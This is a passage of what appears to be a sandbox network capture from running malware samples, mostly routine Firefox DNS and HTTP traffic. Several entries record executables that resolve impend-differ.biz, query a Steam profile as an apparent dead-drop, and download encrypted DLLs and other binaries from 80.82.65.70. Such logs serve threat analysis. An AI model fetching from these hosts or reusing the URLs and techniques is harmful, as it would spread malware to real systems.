                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.ads.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                      Response
                      youtube.com
                      IN AAAA
                      2a00:1450:4007:805::200e
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                    • flag-us
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      Response
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      34.120.5.221
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN A
                      Response
                      shavar.prod.mozaws.net
                      IN A
                      54.213.181.160
                      shavar.prod.mozaws.net
                      IN A
                      35.85.93.176
                      shavar.prod.mozaws.net
                      IN A
                      44.228.225.150
                    • flag-us
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                      Response
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                      2600:1901:0:524c::
                    • flag-us
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN AAAA
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN AAAA
                    • flag-us
                      DNS
                      impend-differ.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      impend-differ.biz
                      IN A
                      Response
                    • flag-us
                      DNS
                      impend-differ.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      impend-differ.biz
                      IN A
                    • flag-us
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                      34.160.144.191
                    • flag-us
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                    • flag-gb
                      GET
                      https://steamcommunity.com/profiles/76561199724331900
                      45c3c2bb5b.exe
                      Remote address:
                      23.214.143.155:443
                      Request
                      GET /profiles/76561199724331900 HTTP/1.1
                      Connection: Keep-Alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Host: steamcommunity.com
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                      Cache-Control: no-cache
                      Date: Fri, 13 Dec 2024 00:07:35 GMT
                      Content-Length: 35598
                      Connection: keep-alive
                      Set-Cookie: sessionid=cf492805cfc5dae4a4940e07; Path=/; Secure; SameSite=None
                      Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                    • flag-us
                      DNS
                      firefox-settings-attachments.cdn.mozilla.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      firefox-settings-attachments.cdn.mozilla.net
                      IN A
                      Response
                      firefox-settings-attachments.cdn.mozilla.net
                      IN CNAME
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.117.121.53
                    • flag-us
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.149.100.209
                    • flag-us
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      Response
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.117.121.53
                    • flag-us
                      DNS
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                      2600:1901:0:92a9::
                    • flag-us
                      DNS
                      www.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.youtube.com
                      IN A
                      Response
                      www.youtube.com
                      IN CNAME
                      youtube-ui.l.google.com
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.174
                      youtube-ui.l.google.com
                      IN A
                      216.58.215.46
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.174
                      youtube-ui.l.google.com
                      IN A
                      172.217.18.206
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.75.238
                      youtube-ui.l.google.com
                      IN A
                      142.250.201.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.178.142
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.110
                      youtube-ui.l.google.com
                      IN A
                      142.250.74.238
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.206
                    • flag-us
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN A
                      Response
                      youtube-ui.l.google.com
                      IN A
                      216.58.215.46
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.206
                      youtube-ui.l.google.com
                      IN A
                      172.217.18.206
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.78
                      youtube-ui.l.google.com
                      IN A
                      216.58.213.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.110
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.174
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.75.238
                      youtube-ui.l.google.com
                      IN A
                      142.250.74.238
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.178.142
                      youtube-ui.l.google.com
                      IN A
                      142.250.201.174
                    • flag-us
                      DNS
                      youtube-ui.l.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube-ui.l.google.com
                      IN AAAA
                      Response
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:810::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:808::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:80e::200e
                      youtube-ui.l.google.com
                      IN AAAA
                      2a00:1450:4007:80c::200e
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-fr
                      GET
                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                      firefox.exe
                      Remote address:
                      142.250.179.110:443
                      Request
                      GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                      host: consent.youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      cookie: YSC=TFrx57vzYjQ
                      cookie: SOCS=CAAaBgiA8u26Bg
                      cookie: __Secure-YEC=CgtSdnpBSkZQMWlDbyjI9e26BjIKCgJHQhIEGgAgPg%3D%3D
                      cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgPg%3D%3D
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN AAAA
                      Response
                      consent.youtube.com
                      IN AAAA
                      2a00:1450:4007:818::200e
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                      Response
                      www.google.com
                      IN A
                      172.217.20.164
                    • flag-fr
                      GET
                      https://www.google.com/favicon.ico
                      firefox.exe
                      Remote address:
                      172.217.20.164:443
                      Request
                      GET /favicon.ico HTTP/2.0
                      host: www.google.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: image/avif,image/webp,*/*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      referer: https://consent.youtube.com/
                      sec-fetch-dest: image
                      sec-fetch-mode: no-cors
                      sec-fetch-site: cross-site
                      te: trailers
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN A
                      Response
                      www.google.com
                      IN A
                      172.217.20.164
                    • flag-us
                      DNS
                      www.google.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.google.com
                      IN AAAA
                      Response
                      www.google.com
                      IN AAAA
                      2a00:1450:4007:80c::2004
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-us
                      DNS
                      consent.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      consent.youtube.com
                      IN A
                      Response
                      consent.youtube.com
                      IN A
                      142.250.179.110
                    • flag-nl
                      GET
                      http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:49 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/dll/key
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /dll/key HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:49 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 21
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/dll/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /dll/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:49 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                      Content-Length: 97296
                      Keep-Alive: timeout=5, max=98
                      Connection: Keep-Alive
                      Content-Type: application/octet-stream
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:50 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=97
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-nl
                      GET
                      http://80.82.65.70/files/download
                      777b33ea97.exe
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:52 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=96
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/files/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:54 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=95
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/files/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:56 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=94
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/files/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:58 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=93
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/files/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:00 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=92
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/files/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:03 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=91
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/files/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:05 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=90
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/files/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:07 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=89
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/files/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:09 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=88
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/files/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /files/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: C
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:11 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Length: 1
                      Keep-Alive: timeout=5, max=87
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • [NL] GET http://80.82.65.70/soft/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /soft/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: d
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:14 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Disposition: attachment; filename="dll";
                      Content-Length: 242176
                      Keep-Alive: timeout=5, max=86
                      Connection: Keep-Alive
                      Content-Type: application/octet-stream
                    • [NL] GET http://80.82.65.70/soft/download  (777b33ea97.exe)
                      Remote address:
                      80.82.65.70:80
                      Request
                      GET /soft/download HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: s
                      Host: 80.82.65.70
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:08:15 GMT
                      Server: Apache/2.4.58 (Ubuntu)
                      Content-Disposition: attachment; filename="soft";
                      Content-Length: 1502720
                      Keep-Alive: timeout=5, max=85
                      Connection: Keep-Alive
                      Content-Type: application/octet-stream
                    • [US] DNS prod.balrog.prod.cloudops.mozgcp.net  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN A
                      Response
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN A
                      35.244.181.201
                    • [US] DNS prod.balrog.prod.cloudops.mozgcp.net  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.balrog.prod.cloudops.mozgcp.net
                      IN AAAA
                      Response
                    • [US] DNS ciscobinary.openh264.org  (firefox.exe)
                      Remote address:
                      8.8.8.8:53
                      Request
                      ciscobinary.openh264.org
                      IN A
                      Response
                      ciscobinary.openh264.org
                      IN CNAME
                      a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                      a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                      IN CNAME
                      a17.rackcdn.com
                      a17.rackcdn.com
                      IN CNAME
                      a17.rackcdn.com.mdc.edgesuite.net
                      a17.rackcdn.com.mdc.edgesuite.net
                      IN CNAME
                      a19.dscg10.akamai.net
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.155
                      a19.dscg10.akamai.net
                      IN A
                      88.221.134.209
                    • [GB] GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip  (firefox.exe)
                      Remote address:
                      88.221.134.155:80
                      Request
                      GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                      Host: ciscobinary.openh264.org
                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      Accept: */*
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Connection: keep-alive
                      Response
                      HTTP/1.1 200 OK
                      Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                      ETag: 85430baed3398695717b0263807cf97c
                      Content-Length: 453023
                      Accept-Ranges: bytes
